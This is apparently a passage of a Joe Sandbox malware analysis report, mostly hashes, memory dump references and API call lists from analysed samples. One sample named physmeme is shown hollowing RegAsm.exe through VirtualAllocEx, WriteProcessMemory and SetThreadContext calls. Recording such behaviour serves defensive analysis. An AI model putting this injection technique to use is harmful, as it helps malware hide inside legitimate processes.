                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 80b2574775618b2a953b1da56e956ad3f1442988d985bf29964b0fb6b73cd5bc
                                                                                                                                                                                                                                                                                      • Instruction ID: 96afb6cad8d299a3719f84d932b0fa73f940170b0aa062e13eb91d5fb15a1075
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 80b2574775618b2a953b1da56e956ad3f1442988d985bf29964b0fb6b73cd5bc
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D518032709B8186DB108F29E45136EB3A1FB85BA4F644276EA9DC77A9DF3CC448C740
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1775671525-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 0753c9bfbc61eec83f2d6d2066a54c55478ae829ae7fd860dc07a65f1fe571d9
                                                                                                                                                                                                                                                                                      • Instruction ID: 02dca0b1ef581fd6ec63f32d217804f27ec4ce43c7b2b3ebb6cf2fda12883e4f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0753c9bfbc61eec83f2d6d2066a54c55478ae829ae7fd860dc07a65f1fe571d9
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C441E022B0AB4581E9109F32A56626EE3A5EB04BF4F644735DAACC7BD5DE7CE051C304
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,00000000,00000004,?,00007FF6A9512BA1), ref: 00007FF6A9530FEC
                                                                                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00000004,?,00007FF6A9512BA1), ref: 00007FF6A9531020
                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,00000000,00000004,?,00007FF6A9512BA1), ref: 00007FF6A953102A
                                                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6A9531053
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1775671525-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 11de380be08ee2fb957b8a2d572bc5fd49fef3055fdead98d002a603b0cf3946
                                                                                                                                                                                                                                                                                      • Instruction ID: c950d6f020380e193b88e6452117a3c9ffd84cb5f59566b361037067721afa88
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 11de380be08ee2fb957b8a2d572bc5fd49fef3055fdead98d002a603b0cf3946
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D131C662B0A78195EE109F31A5563BEE391EB44BE4F644631DA6DCB7D9DE7CE0428300
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1155477157-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 7894f6b97a2e0839fa1c2d8e551e663687c5fca946552e4270e42a7eb5dc5f71
                                                                                                                                                                                                                                                                                      • Instruction ID: 615dab0f4ae593cfd6f69f55b4bae267f704035909705f8bd269b2c8c804ff96
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7894f6b97a2e0839fa1c2d8e551e663687c5fca946552e4270e42a7eb5dc5f71
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0A31C122E0A74281EE149F22A45127962A9EF05BB0F384B74DEBDC77D1DF3CE4968340
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1155477157-0
                                                                                                                                                                                                                                                                                      • Opcode ID: e34b66effb807f945da970ac43e702e255afd8f5138f7f8129d1fdc76c850b29
                                                                                                                                                                                                                                                                                      • Instruction ID: 68b03d3e4bb294c4eaf428fe6f61511576c3652202f5ccaef65918a6dc9214a2
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e34b66effb807f945da970ac43e702e255afd8f5138f7f8129d1fdc76c850b29
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A931F922F06B4584EA25DF72A5613AAE391AB44BE4F244735DE6CC77D1EE3CE081C300
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: memcpy$Concurrency::cancel_current_task
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 326894585-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 4cec9cc6cf9c84b2cc2cd318a518f4d76ac3f4ce0ab6e37f0109f9fbbc4872e8
                                                                                                                                                                                                                                                                                      • Instruction ID: b1bdca979ddbdcf22860ba1ca0e8c4a8243b9493a9b0b98327c35b7c0d74fcac
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4cec9cc6cf9c84b2cc2cd318a518f4d76ac3f4ce0ab6e37f0109f9fbbc4872e8
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D21C922E0B74249EA145F73A5923BAA350AF057E8F740731EE6DC77D2DE3C91928300
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ByteCharErrorLastMultiWide
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 203985260-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 8b623144414a10440eabf51239d1ed257e13474fb39b30ef0d4b909c3b566fa4
                                                                                                                                                                                                                                                                                      • Instruction ID: 51f8d1c9932a9786847b067089f8b90ee405959f66ee94304e36e91d80341d6e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8b623144414a10440eabf51239d1ed257e13474fb39b30ef0d4b909c3b566fa4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AC212976A19B8587E3108F22A45532EB7B4F789B94F240138DB89D7B98DF3CD8458B00
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 25896374efde6f4be44b9769546b532beb04d45f9bf927e805304f4314b9ef4c
                                                                                                                                                                                                                                                                                      • Instruction ID: 842d659943640fb7d716034ad80e76c26356f876bbf44bc270366c11633b8c3d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 25896374efde6f4be44b9769546b532beb04d45f9bf927e805304f4314b9ef4c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13111822B16B018AEB409F71E8562B933A4FB59B58F540E31DA6DC67A4DF78D1A88340
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF6A951262D
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF6A953A404: MultiByteToWideChar.KERNEL32 ref: 00007FF6A953A420
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF6A953A404: GetLastError.KERNEL32 ref: 00007FF6A953A42E
                                                                                                                                                                                                                                                                                      • __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF6A95126CA
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF6A9531380: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6A95112FB), ref: 00007FF6A9531483
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: __std_fs_convert_narrow_to_wide$ByteCharErrorLastMultiWidememcpy
                                                                                                                                                                                                                                                                                      • String ID: Unknown exception
                                                                                                                                                                                                                                                                                      • API String ID: 3269794198-410509341
                                                                                                                                                                                                                                                                                      • Opcode ID: 875133cdc6b0287577d0eae591c5892374f0de79a45dd11bba635482a2eaf8d3
                                                                                                                                                                                                                                                                                      • Instruction ID: 0c6fa7e1427973a2365c9e76077339465d67cad9281ac188012524abaac8b1c7
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 875133cdc6b0287577d0eae591c5892374f0de79a45dd11bba635482a2eaf8d3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7631F0A2A1978682EB28EF62A01266D6391FB45FC8F305136EE4DC7785DF3CE491C340
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: free
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 5306c08254be4f25b98c8f182cf3566cb9460f253310b9e3e7ebdeb50e1a0d8a
                                                                                                                                                                                                                                                                                      • Instruction ID: ede0b228c8c8929ce23e8a597d7016cb66107f6e6f323c4211c7fe24b5ad388d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5306c08254be4f25b98c8f182cf3566cb9460f253310b9e3e7ebdeb50e1a0d8a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 65210F26A0AB4282EA159F22E56626BF361FF84FD0F295031DE8DD7B65DF3CE4518340

                                                                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                                                                      Execution Coverage:44.8%
                                                                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                      Signature Coverage:31.6%
                                                                                                                                                                                                                                                                                      Total number of Nodes:19
                                                                                                                                                                                                                                                                                      Total number of Limit Nodes:0

                                                                                                                                                                                                                                                                                      Callgraph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      • Opacity -> Relevance
                                                                                                                                                                                                                                                                                      • Disassembly available
                                                                                                                                                                                                                                                                                      callgraph 0 Function_00F90479 1 Function_00F90178 2 Function_00F901F8 3 Function_00F90978 57 Function_00F90C2F 3->57 61 Function_00F90B18 3->61 63 Function_00F9051C 3->63 65 Function_00F90510 3->65 78 Function_00F90504 3->78 4 Function_00F9047D 5 Function_00F9027C 6 Function_02AE2129 7 Function_00F90471 8 Function_00F90070 9 Function_00F900F0 10 Function_00F90475 11 Function_00F90469 12 Function_00F908E8 13 Function_00F90AE8 13->61 14 Function_00F9046D 15 Function_00F9026C 16 Function_00F904EF 17 Function_00F90060 18 Function_00F90260 19 Function_00F90165 20 Function_00F900E4 21 Function_00F904D9 22 Function_00F908D9 23 Function_02AE1D0F 24 Function_00F9045C 25 Function_00F90FDF 26 Function_00F904D1 27 Function_00F90450 28 Function_00F90550 29 Function_02AE1F82 30 Function_00F901D5 31 Function_00F904D5 32 Function_00F90154 33 Function_00F900D4 34 Function_00F90054 35 Function_00F90254 36 Function_00F90A57 36->57 36->61 36->63 36->65 37 Function_00F90148 38 Function_00F900C8 39 Function_00F90848 40 Function_00F901C0 41 Function_00F90244 42 Function_00F90444 43 Function_00F9013C 44 Function_00F900BC 45 Function_02AE2469 46 Function_00F90531 47 Function_00F900B0 48 Function_00F90535 49 Function_00F901B4 50 Function_00F90234 51 Function_00F90529 52 Function_00F901A8 53 Function_00F904A8 54 Function_00F910A8 55 Function_00F9052D 56 Function_00F9012C 58 Function_00F90BA1 59 Function_00F900A0 60 Function_00F90224 62 Function_00F90198 64 Function_00F9011C 66 Function_00F90090 67 Function_00F90214 68 Function_00F90489 69 Function_00F90988 69->57 69->61 69->63 69->65 69->78 70 Function_00F90188 71 Function_00F90208 72 Function_00F9048D 73 Function_00F9010C 74 Function_00F90481 75 Function_00F90100 76 Function_00F90080 77 Function_00F90485 79 Function_00F90006

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02AE209B,02AE208B), ref: 02AE2298
                                                                                                                                                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02AE22AB
                                                                                                                                                                                                                                                                                      • Wow64GetThreadContext.KERNEL32(0000009C,00000000), ref: 02AE22C9
                                                                                                                                                                                                                                                                                      • ReadProcessMemory.KERNELBASE(00000098,?,02AE20DF,00000004,00000000), ref: 02AE22ED
                                                                                                                                                                                                                                                                                      • VirtualAllocEx.KERNELBASE(00000098,?,?,00003000,00000040), ref: 02AE2318
                                                                                                                                                                                                                                                                                      • WriteProcessMemory.KERNELBASE(00000098,00000000,?,?,00000000,?), ref: 02AE2370
                                                                                                                                                                                                                                                                                      • WriteProcessMemory.KERNELBASE(00000098,00400000,?,?,00000000,?,00000028), ref: 02AE23BB
                                                                                                                                                                                                                                                                                      • WriteProcessMemory.KERNELBASE(00000098,?,?,00000004,00000000), ref: 02AE23F9
                                                                                                                                                                                                                                                                                      • Wow64SetThreadContext.KERNEL32(0000009C,02AC0000), ref: 02AE2435
                                                                                                                                                                                                                                                                                      • ResumeThread.KERNELBASE(0000009C), ref: 02AE2444
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000024.00000002.1467842908.0000000002AE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE1000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_36_2_2ae1000_physmeme.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                                                                                                                                                                                                      • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                                                                                                                                                                                                      • API String ID: 2687962208-1257834847
                                                                                                                                                                                                                                                                                      • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                                                                                                                                                                                                      • Instruction ID: 9f8a82b673be944d7361f48fc02d702f4d2de617dd2201d5eb27f1771d72b35d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 47B1E67664024AAFDB60CF68CC80BDA77A9FF88714F158564EA0CAB341D774FA41CB94

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 73 f90fdf-f9103b 74 f91043-f91081 VirtualProtectEx 73->74 75 f91088-f9109c 74->75 76 f91083 74->76 76->75
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • VirtualProtectEx.KERNELBASE(?,03AE3590,?,00000001,0000012C), ref: 00F91074
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000024.00000002.1456872365.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_36_2_f90000_physmeme.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 768638ae673c38f31acdc51882c395977f6a3d43eed0092c3eb11b6e42128ed5
                                                                                                                                                                                                                                                                                      • Instruction ID: 9b45b0134042ac8a832e1e5676ef949d3c211aa7c18ce254358eeb1d724771ed
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 768638ae673c38f31acdc51882c395977f6a3d43eed0092c3eb11b6e42128ed5
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 662125B5D052499FCB10CF9AD880ADEFFB0FF48310F10812AE958A7211D3796945CFA1

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 77 f90510-f91081 VirtualProtectEx 80 f91088-f9109c 77->80 81 f91083 77->81 81->80
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • VirtualProtectEx.KERNELBASE(?,03AE3590,?,00000001,0000012C), ref: 00F91074
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000024.00000002.1456872365.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_36_2_f90000_physmeme.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 401b4330156ac2236ae30ea87f36771c383ed264e9fe8619390af2e4bb222eb1
                                                                                                                                                                                                                                                                                      • Instruction ID: cd5c7261c37c066453ac3a4c04323a433c46b64b13e2720f75b641dad77443ff
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 401b4330156ac2236ae30ea87f36771c383ed264e9fe8619390af2e4bb222eb1
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F221FFB6D00259EFDB10CF9AD884BDEFBB4FB48310F10812AE918A7210D375A954CFA5

                                                                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                                                                      Execution Coverage:0.9%
                                                                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                      Signature Coverage:14.6%
                                                                                                                                                                                                                                                                                      Total number of Nodes:48
                                                                                                                                                                                                                                                                                      Total number of Limit Nodes:5
